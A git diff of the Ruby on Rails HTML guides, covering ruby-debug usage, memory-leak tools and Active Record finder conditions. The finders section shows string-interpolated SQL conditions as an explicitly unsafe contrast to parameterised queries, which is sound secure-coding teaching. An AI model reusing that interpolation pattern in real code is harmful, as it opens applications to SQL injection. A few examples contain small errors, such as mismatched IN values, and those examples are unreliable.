    Moving up and down the stack frame: You can use up [n] (u for abbreviated) and down [n] commands in order to change the context n frames up or down the stack respectively. n defaults to one. Up in this case is towards higher-numbered stack frames, and down is towards lower-numbered stack frames.

    +

    The available variables are the same as if you were running the code line by line. After all, that’s what debugging is.

    +

    Moving up and down the stack frame: You can use up [n] (u for abbreviated) and down [n] commands in order to change the context n frames up or down the stack respectively. n defaults to one. Up in this case is towards higher-numbered stack frames, and down is towards lower-numbered stack frames.

    3.4. Threads

    -

    The debugger can list, stop, resume and switch between running threads by using the command thread (or the abbreviated th). This command has a handful of options:

    -
      +

      The debugger can list, stop, resume and switch between running threads by using the command thread (or the abbreviated th). This command has a handful of options:

      +
      • thread shows the current thread. @@ -713,17 +700,17 @@ continue edit frame method putl set tmate where

      -

      This command is very helpful, among other occasions, when you are debugging concurrent threads and need to verify that there are no race conditions in your code.

      +

      This command is very helpful, among other occasions, when you are debugging concurrent threads and need to verify that there are no race conditions in your code.

      3.5. Inspecting Variables

      -

      Any expression can be evaluated in the current context. To evaluate an expression, just type it!

      -

      This example shows how you can print the instance_variables defined within the current context:

      +

      Any expression can be evaluated in the current context. To evaluate an expression, just type it!

      +

      This example shows how you can print the instance_variables defined within the current context:

      @posts = Post.find(:all)
       (rdb:11) instance_variables
       ["@_response", "@action_name", "@url", "@_session", "@_cookies", "@performed_render", "@_flash", "@template", "@_params", "@before_filter_chain_aborted", "@request_origin", "@_headers", "@performed_redirect", "@_request"]
      -

      As you may have figured out, all of the variables that you can access from a controller are displayed. This list is dynamically updated as you execute code. For example, run the next line using next (you'll learn more about this command later in this guide).

      +

      As you may have figured out, all of the variables that you can access from a controller are displayed. This list is dynamically updated as you execute code. For example, run the next line using next (you’ll learn more about this command later in this guide).

      (rdb:11) next
      @@ -733,13 +720,13 @@ Processing PostsController#index (for 127.0.0.1 at 2008-09-04 19:51:34) [GET]
       /PathToProject/posts_controller.rb:8
       respond_to do |format|
      -

      And then ask again for the instance_variables:

      +

      And then ask again for the instance_variables:

      (rdb:11) instance_variables.include? "@posts"
       true
      -

      Now @posts is a included in the instance variables, because the line defining it was executed.

      +

      Now @posts is a included in the instance variables, because the line defining it was executed.

      @@ -748,7 +735,7 @@ true You can also step into irb mode with the command irb (of course!). This way an irb session will be started within the context you invoked it. But be warned: this is an experimental feature.
      -

      The var method is the most convenient way to show variables and their values:

      +

      The var method is the most convenient way to show variables and their values:

      var
      @@ -757,13 +744,13 @@ true
      (rdb:1) v[ar] i[nstance] <object> show instance variables of object (rdb:1) v[ar] l[ocal] show local variables
      -

      This is a great way to inspect the values of the current context variables. For example:

      +

      This is a great way to inspect the values of the current context variables. For example:

      (rdb:9) var local
         __dbg_verbose_save => false
      -

      You can also inspect for an object method this way:

      +

      You can also inspect for an object method this way:

      (rdb:9) var instance Post.new
      @@ -779,16 +766,16 @@ true
    The commands p (print) and pp (pretty print) can be used to evaluate Ruby expressions and display the value of variables to the console.
    -

    You can use also display to start watching variables. This is a good way of tracking the values of a variable while the execution goes on.

    +

    You can use also display to start watching variables. This is a good way of tracking the values of a variable while the execution goes on.

    (rdb:1) display @recent_comments
     1: @recent_comments =
    -

    The variables inside the displaying list will be printed with their values after you move in the stack. To stop displaying a variable use undisplay n where n is the variable number (1 in the last example).

    +

    The variables inside the displaying list will be printed with their values after you move in the stack. To stop displaying a variable use undisplay n where n is the variable number (1 in the last example).

    3.6. Step by Step

    -

    Now you should know where you are in the running trace and be able to print the available variables. But lets continue and move on with the application execution.

    -

    Use step (abbreviated s) to continue running your program until the next logical stopping point and return control to ruby-debug.

    +

    Now you should know where you are in the running trace and be able to print the available variables. But lets continue and move on with the application execution.

    +

    Use step (abbreviated s) to continue running your program until the next logical stopping point and return control to ruby-debug.

    @@ -797,9 +784,9 @@ true You can also use step+ n and step- n to move forward or backward n steps respectively.
    -

    You may also use next which is similar to step, but function or method calls that appear within the line of code are executed without stopping. As with step, you may use plus sign to move n steps.

    -

    The difference between next and step is that step stops at the next line of code executed, doing just a single step, while next moves to the next line without descending inside methods.

    -

    For example, consider this block of code with an included debugger statement:

    +

    You may also use next which is similar to step, but function or method calls that appear within the line of code are executed without stopping. As with step, you may use plus sign to move n steps.

    +

    The difference between next and step is that step stops at the next line of code executed, doing just a single step, while next moves to the next line without descending inside methods.

    +

    For example, consider this block of code with an included debugger statement:

    :limit => limit ) end -end -
    +end
    @@ -839,7 +825,7 @@ Loading development environment (Rails 2.1.0) /PathTo/project/app/models/author.rb:11 ) -

    With the code stopped, take a look around:

    +

    With the code stopped, take a look around:

    (rdb:1) list
    @@ -853,14 +839,14 @@ Loading development environment (Rails 2.1.0)
        12    end
        13  end
    -

    You are at the end of the line, but… was this line executed? You can inspect the instance variables.

    +

    You are at the end of the line, but... was this line executed? You can inspect the instance variables.

    (rdb:1) var instance
     @attributes = {"updated_at"=>"2008-07-31 12:46:10", "id"=>"1", "first_name"=>"Bob", "las...
     @attributes_cache = {}
    -

    @recent_comments hasn't been defined yet, so it's clear that this line hasn't been executed yet. Use the next command to move on in the code:

    +

    @recent_comments hasn’t been defined yet, so it’s clear that this line hasn’t been executed yet. Use the next command to move on in the code:

    (rdb:1) next
    @@ -872,12 +858,12 @@ Loading development environment (Rails 2.1.0)
     @comments = []
     @recent_comments = []
    -

    Now you can see that the @comments relationship was loaded and @recent_comments defined because the line was executed.

    -

    If you want to go deeper into the stack trace you can move single steps, through your calling methods and into Rails code. This is one of the best ways to find bugs in your code, or perhaps in Ruby or Rails.

    +

    Now you can see that the @comments relationship was loaded and @recent_comments defined because the line was executed.

    +

    If you want to go deeper into the stack trace you can move single steps, through your calling methods and into Rails code. This is one of the best ways to find bugs in your code, or perhaps in Ruby or Rails.

    3.7. Breakpoints

    -

    A breakpoint makes your application stop whenever a certain point in the program is reached. The debugger shell is invoked in that line.

    -

    You can add breakpoints dynamically with the command break (or just b). There are 3 possible ways of adding breakpoints manually:

    -
      +

      A breakpoint makes your application stop whenever a certain point in the program is reached. The debugger shell is invoked in that line.

      +

      You can add breakpoints dynamically with the command break (or just b). There are 3 possible ways of adding breakpoints manually:

      +
      • break line: set breakpoint in the line in the current source file. @@ -890,7 +876,7 @@ Loading development environment (Rails 2.1.0)

      • -break class(.|#)method [if expression]: set breakpoint in method (. and # for class and instance method respectively) defined in class. The expression works the same way as with file:line. +break class(.|#)method [if expression]: set breakpoint in method (. and \# for class and instance method respectively) defined in class. The expression works the same way as with file:line.

      @@ -899,22 +885,22 @@ Loading development environment (Rails 2.1.0)
      (rdb:5) break 10
       Breakpoint 1 file /PathTo/project/vendor/rails/actionpack/lib/action_controller/filters.rb, line 10
    -

    Use info breakpoints n or info break n to list breakpoints. If you supply a number, it lists that breakpoint. Otherwise it lists all breakpoints.

    +

    Use info breakpoints n or info break n to list breakpoints. If you supply a number, it lists that breakpoint. Otherwise it lists all breakpoints.

    (rdb:5) info breakpoints
     Num Enb What
       1 y   at filters.rb:10
    -

    To delete breakpoints: use the command delete n to remove the breakpoint number n. If no number is specified, it deletes all breakpoints that are currently active..

    +

    To delete breakpoints: use the command delete n to remove the breakpoint number n. If no number is specified, it deletes all breakpoints that are currently active..

    (rdb:5) delete 1
     (rdb:5) info breakpoints
     No breakpoints.
    -

    You can also enable or disable breakpoints:

    -
      +

      You can also enable or disable breakpoints:

      +
      • enable breakpoints: allow a list breakpoints or all of them if no list is specified, to stop your program. This is the default state when you create a breakpoint. @@ -927,11 +913,11 @@ No breakpoints.

      3.8. Catching Exceptions

      -

      The command catch exception-name (or just cat exception-name) can be used to intercept an exception of type exception-name when there would otherwise be is no handler for it.

      -

      To list all active catchpoints use catch.

      +

      The command catch exception-name (or just cat exception-name) can be used to intercept an exception of type exception-name when there would otherwise be is no handler for it.

      +

      To list all active catchpoints use catch.

      3.9. Resuming Execution

      -

      There are two ways to resume execution of an application that is stopped in the debugger:

      -
        +

        There are two ways to resume execution of an application that is stopped in the debugger:

        +
        • continue [line-specification] (or c): resume program execution, at the address where your script last stopped; any breakpoints set at that address are bypassed. The optional argument line-specification allows you to specify a line number to set a one-time breakpoint which is deleted when that breakpoint is reached. @@ -944,8 +930,8 @@ No breakpoints.

        3.10. Editing

        -

        Two commands allow you to open code from the debugger into an editor:

        -
          +

          Two commands allow you to open code from the debugger into an editor:

          +
          • edit [file:line]: edit file using the editor specified by the EDITOR environment variable. A specific line can also be given. @@ -958,11 +944,11 @@ No breakpoints.

          3.11. Quitting

          -

          To exit the debugger, use the quit command (abbreviated q), or its alias exit.

          -

          A simple quit tries to terminate all threads in effect. Therefore your server will be stopped and you will have to start it again.

          +

          To exit the debugger, use the quit command (abbreviated q), or its alias exit.

          +

          A simple quit tries to terminate all threads in effect. Therefore your server will be stopped and you will have to start it again.

          3.12. Settings

          -

          There are some settings that can be configured in ruby-debug to make it easier to debug your code. Here are a few of the available options:

          -
            +

            There are some settings that can be configured in ruby-debug to make it easier to debug your code. Here are a few of the available options:

            +
            • set reload: Reload source code when changed. @@ -984,7 +970,7 @@ No breakpoints.

            -

            You can see the full list by using help set. Use help set subcommand to learn about a particular set command.

            +

            You can see the full list by using help set. Use help set subcommand to learn about a particular set command.

            @@ -993,7 +979,7 @@ No breakpoints. You can include any number of these configuration lines inside a .rdebugrc file in your HOME directory. ruby-debug will read this file every time it is loaded. and configure itself accordingly.
            -

            Here's a good start for an .rdebugrc:

            +

            Here’s a good start for an .rdebugrc:

            set autolist
            @@ -1003,37 +989,36 @@ set listsize 25

            4. Debugging Memory Leaks

            -

            A Ruby application (on Rails or not), can leak memory - either in the Ruby code or at the C code level.

            -

            In this section, you will learn how to find and fix such leaks by using Bleak House and Valgrind debugging tools.

            +

            A Ruby application (on Rails or not), can leak memory - either in the Ruby code or at the C code level.

            +

            In this section, you will learn how to find and fix such leaks by using Bleak House and Valgrind debugging tools.

            4.1. BleakHouse

            -

            BleakHouse is a library for finding memory leaks.

            -

            If a Ruby object does not go out of scope, the Ruby Garbage Collector won't sweep it since it is referenced somewhere. Leaks like this can grow slowly and your application will consume more and more memory, gradually affecting the overall system performance. This tool will help you find leaks on the Ruby heap.

            -

            To install it run:

            +

            BleakHouse is a library for finding memory leaks.

            +

            If a Ruby object does not go out of scope, the Ruby Garbage Collector won’t sweep it since it is referenced somewhere. Leaks like this can grow slowly and your application will consume more and more memory, gradually affecting the overall system performance. This tool will help you find leaks on the Ruby heap.

            +

            To install it run:

            sudo gem install bleak_house
            -

            Then setup you application for profiling. Then add the following at the bottom of config/environment.rb:

            +

            Then setup you application for profiling. Then add the following at the bottom of config/environment.rb:

            -
            require 'bleak_house' if ENV['BLEAK_HOUSE']
            -
            -

            Start a server instance with BleakHouse integration:

            +
            require 'bleak_house' if ENV['BLEAK_HOUSE']
            +

            Start a server instance with BleakHouse integration:

            RAILS_ENV=production BLEAK_HOUSE=1 ruby-bleak-house ./script/server
            -

            Make sure to run a couple hundred requests to get better data samples, then press CTRL-C. The server will stop and Bleak House will produce a dumpfile in /tmp:

            +

            Make sure to run a couple hundred requests to get better data samples, then press CTRL-C. The server will stop and Bleak House will produce a dumpfile in /tmp:

            ** BleakHouse: working...
             ** BleakHouse: complete
             ** Bleakhouse: run 'bleak /tmp/bleak.5979.0.dump' to analyze.
            -

            To analyze it, just run the listed command. The top 20 leakiest lines will be listed:

            +

            To analyze it, just run the listed command. The top 20 leakiest lines will be listed:

              191691 total objects
            @@ -1049,17 +1034,17 @@ http://www.gnu.org/software/src-highlite -->
                834 /opt/local//lib/ruby/site_ruby/1.8/rubygems/version.rb:146:Array
               ...
            -

            This way you can find where your application is leaking memory and fix it.

            -

            If BleakHouse doesn't report any heap growth but you still have memory growth, you might have a broken C extension, or real leak in the interpreter. In that case, try using Valgrind to investigate further.

            +

            This way you can find where your application is leaking memory and fix it.

            +

            If BleakHouse doesn’t report any heap growth but you still have memory growth, you might have a broken C extension, or real leak in the interpreter. In that case, try using Valgrind to investigate further.

            4.2. Valgrind

            -

            Valgrind is a Linux-only application for detecting C-based memory leaks and race conditions.

            -

            There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail. For example, a C extension in the interpreter calls malloc() but is doesn't properly call free(), this memory won't be available until the app terminates.

            -

            For further information on how to install Valgrind and use with Ruby, refer to Valgrind and Ruby by Evan Weaver.

            +

            Valgrind is a Linux-only application for detecting C-based memory leaks and race conditions.

            +

            There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail. For example, a C extension in the interpreter calls malloc() but is doesn’t properly call free(), this memory won’t be available until the app terminates.

            +

            For further information on how to install Valgrind and use with Ruby, refer to Valgrind and Ruby by Evan Weaver.

          5. Plugins for Debugging

          -

          There are some Rails plugins to help you to find errors and debug your application. Here is a list of useful plugins for debugging:

          -
            +

            There are some Rails plugins to help you to find errors and debug your application. Here is a list of useful plugins for debugging:

            +
            • Footnotes: Every Rails page has footnotes that give request information and link back to your source via TextMate. @@ -1094,7 +1079,7 @@ http://www.gnu.org/software/src-highlite -->

            6. References

            -
              +

              7. Changelog

              - -
                + +
                • November 3, 2008: Accepted for publication. Added RJS, memory leaks and plugins chapters by Emilio Tagua diff --git a/railties/doc/guides/html/finders.html b/railties/doc/guides/html/finders.html index 603f488cc9..eeba1d71f0 100644 --- a/railties/doc/guides/html/finders.html +++ b/railties/doc/guides/html/finders.html @@ -217,6 +217,8 @@ ul#navMain {

                • Placeholder Conditions
                • +
                • Hash Conditions
                • +
              • @@ -232,6 +234,9 @@ ul#navMain { Group
              • + Having +
              • +
              • Read Only
              • @@ -305,8 +310,8 @@ ul#navMain {

                Rails Finders

                -

                This guide covers the find method defined in ActiveRecord::Base, as well as other ways of finding particular instances of your models. By using this guide, you will be able to:

                -
                  +

                  This guide covers the find method defined in ActiveRecord::Base, as well as other ways of finding particular instances of your models. By using this guide, you will be able to:

                  +
                  • Find records using a variety of methods and conditions @@ -343,13 +348,13 @@ Perform aggregate calculations on Active Record models

                  -

                  If you're used to using raw SQL to find database records, you'll find that there are generally better ways to carry out the same operations in Rails. Active Record insulates you from the need to use SQL in most cases.

                  -

                  The SQL in your log may have some quoting, and that quoting depends on the backend (MySQL, for example, puts backticks around field and table names). Attempting to copy the raw SQL contained within this guide may not work in your database system. Please consult the database systems manual before attempting to execute any SQL.

                  +

                  If you’re used to using raw SQL to find database records, you’ll find that there are generally better ways to carry out the same operations in Rails. Active Record insulates you from the need to use SQL in most cases.

                  +

                  The SQL in your log may have some quoting, and that quoting depends on the backend (MySQL, for example, puts backticks around field and table names). Attempting to copy the raw SQL contained within this guide may not work in your database system. Please consult the database systems manual before attempting to execute any SQL.

                1. The Sample Models

                -

                This guide demonstrates finding using the following models:

                +

                This guide demonstrates finding using the following models:

                class Role < ActiveRecord::Base has_and_belongs_to_many :clients -end -
                +end
              • 2. Database Agnostic

                -

                Active Record will perform queries on the database for you and is compatible with most database systems (MySQL, PostgreSQL and SQLite to name a few). Regardless of which database system you're using, the Active Record method format will always be the same.

                +

                Active Record will perform queries on the database for you and is compatible with most database systems (MySQL, PostgreSQL and SQLite to name a few). Regardless of which database system you’re using, the Active Record method format will always be the same.

                3. IDs, First, Last and All

                -

                ActiveRecord::Base has methods defined on it to make interacting with your database and the tables within it much, much easier. For finding records, the key method is find. This method allows you to pass arguments into it to perform certain queries on your database without the need of SQL. If you wanted to find the record with the id of 1, you could type Client.find(1) which would execute this query on your database:

                +

                ActiveRecord::Base has methods defined on it to make interacting with your database and the tables within it much, much easier. For finding records, the key method is find. This method allows you to pass arguments into it to perform certain queries on your database without the need of SQL. If you wanted to find the record with the id of 1, you could type Client.find(1) which would execute this query on your database:

                -
                SELECT * FROM clients WHERE (clients.id = 1)
                -
                +
                SELECT * FROM clients WHERE (clients.id = 1)
              @@ -400,14 +403,13 @@ http://www.gnu.org/software/src-highlite --> Because this is a standard table created from a migration in Rails, the primary key is defaulted to id. If you have specified a different primary key in your migrations, this is what Rails will find on when you call the find method, not the id column.
              -

              If you wanted to find clients with id 1 or 2, you call Client.find([1,2]) or Client.find(1,2) and then this will be executed as:

              +

              If you wanted to find clients with id 1 or 2, you call Client.find([1,2]) or Client.find(1,2) and then this will be executed as:

              -
              SELECT * FROM clients WHERE (clients.id IN (1,2))
              -
              +
              SELECT * FROM clients WHERE (clients.id IN (1,2))
            >> Client.find(1,2)
            @@ -416,46 +418,44 @@ http://www.gnu.org/software/src-highlite -->
               #<Client id: 2, name: => "Michael", locked: false, orders_count: 3,
               created_at: "2008-09-28 13:12:40", updated_at: "2008-09-28 13:12:40">]
            -

            Note that if you pass in a list of numbers that the result will be returned as an array, not as a single Client object.

            +

            Note that if you pass in a list of numbers that the result will be returned as an array, not as a single Client object.

            - +
            Note If find(id) or find([id1, id2]) fails to find any records, it will raise a RecordNotFound exception.If find(id) or find([id1, id2]) fails to find any records, it will raise a RecordNotFound exception.
            -

            If you wanted to find the first Client object you would simply type Client.first and that would find the first client in your clients table:

            +

            If you wanted to find the first Client object you would simply type Client.first and that would find the first client in your clients table:

            >> Client.first
             => #<Client id: 1, name: => "Ryan", locked: false, orders_count: 2,
               created_at: "2008-09-28 15:38:50", updated_at: "2008-09-28 15:38:50">
            -

            If you were reading your log file (the default is log/development.log) you may see something like this:

            +

            If you were reading your log file (the default is log/development.log) you may see something like this:

            -
            SELECT * FROM clients LIMIT 1
            -
            -

            Indicating the query that Rails has performed on your database.

            -

            To find the last Client object you would simply type Client.last and that would find the last client created in your clients table:

            +
            SELECT * FROM clients LIMIT 1
          +

          Indicating the query that Rails has performed on your database.

          +

          To find the last Client object you would simply type Client.last and that would find the last client created in your clients table:

          >> Client.last
           => #<Client id: 2, name: => "Michael", locked: false, orders_count: 3,
             created_at: "2008-09-28 13:12:40", updated_at: "2008-09-28 13:12:40">
          -

          If you were reading your log file (the default is log/development.log) you may see something like this:

          +

          If you were reading your log file (the default is log/development.log) you may see something like this:

          -
          SELECT * FROM clients ORDER BY id DESC LIMIT 1
          -
          +
          SELECT * FROM clients ORDER BY id DESC LIMIT 1
        @@ -469,9 +469,8 @@ http://www.gnu.org/software/src-highlite --> by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite --> -
        SELECT * FROM clients ORDER BY clients.id DESC LIMIT 1
        -
        -

        To find all the Client objects you would simply type Client.all and that would find all the clients in your clients table:

        +
        SELECT * FROM clients ORDER BY clients.id DESC LIMIT 1
        +

        To find all the Client objects you would simply type Client.all and that would find all the clients in your clients table:

        >> Client.all
        @@ -480,41 +479,39 @@ http://www.gnu.org/software/src-highlite -->
           #<Client id: 2, name: => "Michael", locked: false, orders_count: 3,
           created_at: "2008-09-28 13:12:40", updated_at: "2008-09-28 13:12:40">]
        -

        You may see in Rails code that there are calls to methods such as Client.find(:all), Client.find(:first) and Client.find(:last). These methods are just alternatives to Client.all, Client.first and Client.last respectively.

        -

        Be aware that Client.first/Client.find(:first) and Client.last/Client.find(:last) will both return a single object, where as Client.all/Client.find(:all) will return an array of Client objects, just as passing in an array of ids to find will do also.

        +

        You may see in Rails code that there are calls to methods such as Client.find(:all), Client.find(:first) and Client.find(:last). These methods are just alternatives to Client.all, Client.first and Client.last respectively.

        +

        Be aware that Client.first/Client.find(:first) and Client.last/Client.find(:last) will both return a single object, where as Client.all/Client.find(:all) will return an array of Client objects, just as passing in an array of ids to find will do also.

        4. Conditions

        -

        The find method allows you to specify conditions to limit the records returned. You can specify conditions as a string, array, or hash.

        +

        The find method allows you to specify conditions to limit the records returned. You can specify conditions as a string, array, or hash.

        4.1. Pure String Conditions

        -

        If you'd like to add conditions to your find, you could just specify them in there, just like Client.first(:conditions ⇒ "orders_count = 2"). This will find all clients where the orders_count field's value is 2.

        +

        If you’d like to add conditions to your find, you could just specify them in there, just like Client.first(:conditions => "orders_count = 2"). This will find all clients where the orders_count field’s value is 2.

        - +
        Warning Building your own conditions as pure strings can leave you vulnerable to SQL injection exploits. For example, Client.first(:conditions ⇒ "name LIKE %#{params[:name]}%") is not safe. See the next section for the preferred way to handle conditions using an array.Building your own conditions as pure strings can leave you vulnerable to SQL injection exploits. For example, Client.first(:conditions => "name LIKE %#{params[:name]}%") is not safe. See the next section for the preferred way to handle conditions using an array.

        4.2. Array Conditions

        -

        Now what if that number could vary, say as a parameter from somewhere, or perhaps from the user's level status somewhere? The find then becomes something like Client.first(:conditions ⇒ ["orders_count = ?", params[:orders]]). Active Record will go through the first element in the conditions value and any additional elements will replace the question marks (?) in the first element. If you want to specify two conditions, you can do it like Client.first(:conditions ⇒ ["orders_count = ? AND locked = ?", params[:orders], false]). In this example, the first question mark will be replaced with the value in params[:orders] and the second will be replaced with false and this will find the first record in the table that has 2 as its value for the orders_count field and false for its locked field.

        -

        The reason for doing code like:

        +

        Now what if that number could vary, say as a argument from somewhere, or perhaps from the user’s level status somewhere? The find then becomes something like Client.first(:conditions => ["orders_count = ?", params[:orders]]). Active Record will go through the first element in the conditions value and any additional elements will replace the question marks (?) in the first element. If you want to specify two conditions, you can do it like Client.first(:conditions => ["orders_count = ? AND locked = ?", params[:orders], false]). In this example, the first question mark will be replaced with the value in params[:orders] and the second will be replaced with the SQL representation of false, which depends on the adapter.

        +

        The reason for doing code like:

        -
        Client.first(:conditions => ["orders_count = ?", params[:orders]])
        -
        -

        instead of:

        +
        Client.first(:conditions => ["orders_count = ?", params[:orders]])
        +

        instead of:

        -
        Client.first(:conditions => "orders_count = #{params[:orders]}")
        -
        -

        is because of parameter safety. Putting the variable directly into the conditions string will pass the variable to the database as-is. This means that it will be an unescaped variable directly from a user who may have malicious intent. If you do this, you put your entire database at risk because once a user finds out he or she can exploit your database they can do just about anything to it. Never ever put your parameters directly inside the conditions string.

        +
        Client.first(:conditions => "orders_count = #{params[:orders]}")
        +

        is because of argument safety. Putting the variable directly into the conditions string will pass the variable to the database as-is. This means that it will be an unescaped variable directly from a user who may have malicious intent. If you do this, you put your entire database at risk because once a user finds out he or she can exploit your database they can do just about anything to it. Never ever put your arguments directly inside the conditions string.

        @@ -523,16 +520,15 @@ http://www.gnu.org/software/src-highlite --> For more information on the dangers of SQL injection, see the Ruby on Rails Security Guide.
        -

        If you're looking for a range inside of a table (for example, users created in a certain timeframe) you can use the conditions option coupled with the IN sql statement for this. If you had two dates coming in from a controller you could do something like this to look for a range:

        +

        If you’re looking for a range inside of a table (for example, users created in a certain timeframe) you can use the conditions option coupled with the IN sql statement for this. If you had two dates coming in from a controller you could do something like this to look for a range:

        Client.all(:conditions => ["created_at IN (?)",
        -  (params[:start_date].to_date)..(params[:end_date].to_date)])
        -
        -

        This would generate the proper query which is great for small ranges but not so good for larger ranges. For example if you pass in a range of date objects spanning a year that's 365 (or possibly 366, depending on the year) strings it will attempt to match your field against.

        + (params[:start_date].to_date)..(params[:end_date].to_date)]) +

        This would generate the proper query which is great for small ranges but not so good for larger ranges. For example if you pass in a range of date objects spanning a year that’s 365 (or possibly 366, depending on the year) strings it will attempt to match your field against.

        '2008-01-18','2008-01-19','2008-01-20','2008-01-21','2008-01-22','2008-01-23',...2008-12-15','2008-12-16','2008-12-17','2008-12-18','2008-12-19','2008-12-20', '2008-12-21','2008-12-22','2008-12-23','2008-12-24','2008-12-25','2008-12-26', - '2008-12-27','2008-12-28','2008-12-29','2008-12-30','2008-12-31')) -
        -

        Things can get really messy if you pass in time objects as it will attempt to compare your field to every second in that range:

        + '2008-12-27','2008-12-28','2008-12-29','2008-12-30','2008-12-31')) +

        Things can get really messy if you pass in Time objects as it will attempt to compare your field to every second in that range:

        Client.all(:conditions => ["created_at IN (?)",
        -  (params[:start_date].to_date.to_time)..(params[:end_date].to_date.to_time)])
        -
        + (params[:start_date].to_date.to_time)..(params[:end_date].to_date.to_time)])
        SELECT * FROM users WHERE (created_at IN
           ('2007-12-01 00:00:00', '2007-12-01 00:00:01' ...
        -  '2007-12-01 23:59:59', '2007-12-02 00:00:00'))
        -
        -

        This could possibly cause your database server to raise an unexpected error, for example MySQL will throw back this error:

        + '2007-12-01 23:59:59', '2007-12-02 00:00:00')) +

        This could possibly cause your database server to raise an unexpected error, for example MySQL will throw back this error:

        Got a packet bigger than 'max_allowed_packet' bytes: _query_
        -

        Where query is the actual query used to get that error.

        -

        In this example it would be better to use greater-than and less-than operators in SQL, like so:

        +

        Where query is the actual query used to get that error.

        +

        In this example it would be better to use greater-than and less-than operators in SQL, like so:

        Client.all(:conditions =>
        -  ["created_at > ? AND created_at < ?", params[:start_date], params[:end_date]])
        -
        -

        You can also use the greater-than-or-equal-to and less-than-or-equal-to like this:

        + ["created_at > ? AND created_at < ?", params[:start_date], params[:end_date]]) +

        You can also use the greater-than-or-equal-to and less-than-or-equal-to like this:

        Client.all(:conditions =>
        -  ["created_at >= ? AND created_at <= ?", params[:start_date], params[:end_date]])
        -
        -

        Just like in Ruby.

        + ["created_at >= ? AND created_at <= ?", params[:start_date], params[:end_date]]) +

        Just like in Ruby. If you want a shorter syntax be sure to check out the Hash Conditions section later on in the guide.

        4.3. Placeholder Conditions

        -

        Similar to the array style of params you can also specify keys in your conditions:

        +

        Similar to the array style of params you can also specify keys in your conditions:

        Client.all(:conditions =>
        -  ["created_at >= :start_date AND created_at <= :end_date", { :start_date => params[:start_date], :end_date => params[:end_date] }])
        -
        -

        This makes for clearer readability if you have a large number of variable conditions.

        + ["created_at >= :start_date AND created_at <= :end_date", { :start_date => params[:start_date], :end_date => params[:end_date] }]) +

        This makes for clearer readability if you have a large number of variable conditions.

        +

        4.4. Hash Conditions

        +

        Rails also allows you to pass in a hash conditions which can increase the readability of your conditions syntax. With hash conditions, you pass in a hash with keys of the fields you want conditionalised and the values of how you want to conditionalise them:

        +
        +
        +
        Client.all(:conditions => { :locked => true })
        +

        The field name does not have to be a symbol it can also be a string:

        +
        +
        +
        Client.all(:conditions => { 'locked' => true })
        +

        The good thing about this is that we can pass in a range for our fields without it generating a large query as shown in the preamble of this section.

        +
        +
        +
        Client.all(:conditions => { :created_at => (Time.now.midnight - 1.day)..Time.now.midnight})
        +

        This will find all clients created yesterday by using a BETWEEN sql statement:

        +
        +
        +
        SELECT * FROM `clients` WHERE (`clients`.`created_at` BETWEEN '2008-12-21 00:00:00' AND '2008-12-22 00:00:00')
        +

        This demonstrates a shorter syntax for the examples in Array Conditions

        +

        You can also join in tables and specify their columns in the hash:

        +
        +
        +
        Client.all(:include => "orders", :conditions => { 'orders.created_at' => (Time.now.midnight - 1.day)..Time.now.midnight })
        +

        An alternative and cleaner syntax to this is:

        +
        +
        +
        Client.all(:include => "orders", :conditions => { :orders => { :created_at => (Time.now.midnight - 1.day)..Time.now.midnight } })
        +

        This will find all clients who have orders that were created yesterday, again using a BETWEEN expression.

        +

        If you want to find records using the IN expression you can pass an array to the conditions hash:

        +
        +
        +
        Client.all(:include => "orders", :conditions => { :orders_count => [1,3,5] }
        +

        This code will generate SQL like this:

        +
        +
        +
        SELECT * FROM `clients` WHERE (`clients`.`orders_count` IN (1,2,3))

        5. Ordering

        -

        If you're getting a set of records and want to force an order, you can use Client.all(:order ⇒ "created_at") which by default will sort the records by ascending order. If you'd like to order it in descending order, just tell it to do that using Client.all(:order ⇒ "created_at desc")

        +

        If you’re getting a set of records and want to order them in ascending order by the created_at field in your table, you can use Client.all(:order => "created_at"). If you’d like to order it in descending order, just tell it to do that using Client.all(:order => "created_at desc"). The value for this option is passed in as sanitized SQL and allows you to sort via multiple fields: Client.all(:order => "created_at desc, orders_count asc").

        6. Selecting Certain Fields

        -

        To select certain fields, you can use the select option like this: Client.first(:select ⇒ "viewable_by, locked"). This select option does not use an array of fields, but rather requires you to type SQL-like code. The above code will execute SELECT viewable_by, locked FROM clients LIMIT 0,1 on your database.

        -

        You can also call SQL functions within the select option. For example, if you would like to only grab a single record per unique value in a certain field by using the DISTINCT function you can do it like this: Client.all(:select ⇒ "DISTINCT(name)").

        +

        To select certain fields, you can use the select option like this: Client.first(:select => "viewable_by, locked"). This select option does not use an array of fields, but rather requires you to type SQL-like code. The above code will execute SELECT viewable_by, locked FROM clients LIMIT 1 on your database.

        +

        Be careful because this also means you’re initializing a model object with only the fields that you’ve selected. If you attempt to access a field that is not in the initialized record you’ll receive:

        +
        +
        +
        ActiveRecord::MissingAttributeError: missing attribute: <attribute>
        +
        +

        Where <attribute> is the atrribute you asked for. The id method will not raise the ActiveRecord::MissingAttributeError, so just be careful when working with associations because they need the id method to function properly.

        +

        You can also call SQL functions within the select option. For example, if you would like to only grab a single record per unique value in a certain field by using the DISTINCT function you can do it like this: Client.all(:select => "DISTINCT(name)").

        7. Limit & Offset

        -

        If you want to limit the amount of records to a certain subset of all the records retrieved you usually use limit for this, sometimes coupled with offset. Limit is the maximum number of records that will be retrieved from a query, and offset is the number of records it will start reading from from the first record of the set. Take this code for example:

        +

        If you want to limit the amount of records to a certain subset of all the records retrieved you usually use limit for this, sometimes coupled with offset. Limit is the maximum number of records that will be retrieved from a query, and offset is the number of records it will start reading from from the first record of the set. Take this code for example:

        -
        Client.all(:limit => 5)
        -
        -

        This code will return a maximum of 5 clients and because it specifies no offset it will return the first 5 clients in the table. The SQL it executes will look like this:

        +
        Client.all(:limit => 5)
        +

        This code will return a maximum of 5 clients and because it specifies no offset it will return the first 5 clients in the table. The SQL it executes will look like this:

        -
        SELECT * FROM clients LIMIT 5
        -
        +
        SELECT * FROM clients LIMIT 5
        -
        Client.all(:limit => 5, :offset => 5)
        -
        -

        This code will return a maximum of 5 clients and because it specifies an offset this time, it will return these records starting from the 5th client in the clients table. The SQL looks like:

        +
        Client.all(:limit => 5, :offset => 5)
        +

        This code will return a maximum of 5 clients and because it specifies an offset this time, it will return these records starting from the 5th client in the clients table. The SQL looks like:

        -
        SELECT * FROM clients LIMIT 5, 5
        -
        +
        SELECT * FROM clients LIMIT 5, 5

        8. Group

        -

